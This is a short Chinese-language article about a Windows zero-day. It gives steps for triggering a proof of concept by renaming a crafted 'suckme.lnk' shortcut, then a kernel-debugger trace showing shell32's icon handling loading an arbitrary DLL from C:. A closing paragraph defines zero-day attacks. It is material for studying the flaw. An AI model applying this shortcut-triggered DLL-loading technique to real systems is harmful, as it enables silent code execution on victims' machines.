零日漏洞攻击代码

文章标题：零日漏洞攻击代码

文章内容：

从[1]处获取信息：

1. 在'C:'目录下解压缩文件。启动DbgView或在虚拟机中插入KD。

2. 将'suckme.lnk_'重命名为'suckme.lnk'，让shell32.dll的魔力继续发挥作用。

3. 查看日志。

测试在XP SP3下进行。

kd> g

断点1被触发

eax=00000001, ebx=00f5ee7c, ecx=0000c666, edx=00200003, esi=00000001, edi=7c80a6e4

eip=7ca78712, esp=00f5e9c4, ebp=00f5ec18, iopl=0, nv up ei pl nz na po nc

cs=001b, ss=0023, ds=0023, es=0023, fs=003b, gs=0000, efl=00000202

SHELL32!_LoadCPLModule+0x10d:

001b:7ca78712 ff15a0159d7c call dword ptr [SHELL32!_imp__LoadLibraryW (7c9d15a0)]

kd> dd esp

00f5e9c4, 00f5ee7c, 000a27bc, 00f5ee78, 00000000

00f5e9d4, 00000020, 00000008, 00f5ee7c, 00000000

00f5e9e4, 00000000, 0000007b, 00000000, 00000000

00f5e9f4, 00200073, 002000e0, 0000064c, 0000028c

00f5ea04, 1530000a, 00000000, 003a0043, 0064005c

00f5ea14, 006c006c, 0064002e, 006c006c, 006d002e

00f5ea24, 006e0061, 00660069, 00730065, 00000074

00f5ea34, 00090608, 7c92005d, 00000000, 00000007

kd> db 00f5ee7c

00f5ee7c, C.:.\.d.l.l...d.

00f5ee8c, l.l....|......r.

00f5ee9c, K..........|....

00f5eeac, ...|0...4.......

00f5eebc, ...|0.......P@..

00f5eecc, ...|@...

00f5eedc, ...|0.......P@...

00f5eeec, ...........|

kd> kv

子EBP 返回地址 参数到子进程

00f5ec18, 7ca81a74, 00f5ee7c, 000a27bc, 00f5f2c4, SHELL32!_LoadCPLModule+0x10d (FPO: [1,145,4])

00f5ee50, 7ca82543, 00f5ee74, 000a27bc, 000a27c0, SHELL32!CPL_LoadAndFindApplet+0x4a (FPO: [4,136,4])

00f5f294, 7cb56065, 000a25b4, 000a27bc, 000a27c0, SHELL32!CPL_FindCPLInfo+0x46 (FPO: [4,264,4])

00f5f2b8, 7ca13714, 00000082, 00000000, 00000104, SHELL32!CCtrlExtIconBase::_GetIconLocationW+0x7b (FPO: [5,0,0])

00f5f2d4, 7ca1d306, 000a25ac, 00000082, 00f5f570, SHELL32!CExtractIconBase::GetIconLocation+0x1f (FPO: [6,0,0])

00f5f410, 7ca133b6, 000dd7e0, 00000082, 00f5f570, SHELL32!CShellLink::GetIconLocation+0x69 (FPO: [6,68,4])

00f5f77c, 7ca03c88, 000dd7e0, 00000000, 0015aa00, SHELL32!_GetILIndexGivenPXIcon+0x9c (FPO: [5,208,4])

00f5f7a4, 7ca06693, 00131c60, 000dd7e0, 0015aa00, SHELL32!SHGetIconFromPIDL+0x90 (FPO: [5,0,4])

00f5fe20, 7ca12db0, 00131c64, 0015aa00, 00000000, SHELL32!CFSFolder::GetIconOf+0x24e (FPO: [4,405,4])

00f5fe40, 7ca15e3c, 00131c60, 00131c64, 0015aa00, SHELL32!SHGetIconFromPIDL+0x20 (FPO: [5,0,0])

00f5fe68, 7ca03275, 000f8090, 0014d5b0, 0014a910, SHELL32!CGetIconTask::RunInitRT+0x47 (FPO: [1,2,4])

00f5fe84, 75f11b9a, 000f8090, 75f11b18, 75f10000, SHELL32!CRunnableTask::Run+0x54 (FPO: [1,1,4])

00f5fee0, 77f49598, 00155658, 000cb748, 77f4957b, BROWSEUI!CShellTaskScheduler_ThreadProc+0x111 (FPO: [1,17,0])

00f5fef8, 7c937ac2, 000cb748, 7c98e440, 0014cfe0, SHLWAPI!ExecuteWorkItem+0x1d (FPO: [1,0,4])

00f5ff40, 7c937b03, 77f4957b, 000cb748, 00000000, ntdll!RtlpWorkerCallout+0x70 (FPO: [Non-Fpo])

00f5ff60, 7c937bc5, 00000000, 000cb748, 0014cfe0, ntdll!RtlpExecuteWorkerRequest+0x1a (FPO: [3,0,0])

00f5ff74, 7c937b9c, 7c937ae9, 00000000, 000cb748, ntdll!RtlpApcCallout+0x11 (FPO: [4,0,0])

00f5ffb4, 7c80b729, 00000000, 00edfce4, 00edfce8, ntdll!RtlpWorkerThread+0x87 (FPO: [1,7,0])

00f5ffec, 00000000, 7c920250, 00000000, 00000000, kernel32!BaseThreadStart+0x37 (FPO: [Non-Fpo])

扩展资料

“零日漏洞”(zero-day)又叫零时差攻击，是指被发现后立即被恶意利用的安全漏洞。通俗地讲，即安全补丁与瑕疵曝光的同一日内，相关的恶意程序就出现。这种攻击往往具有很大的突发性与破坏性。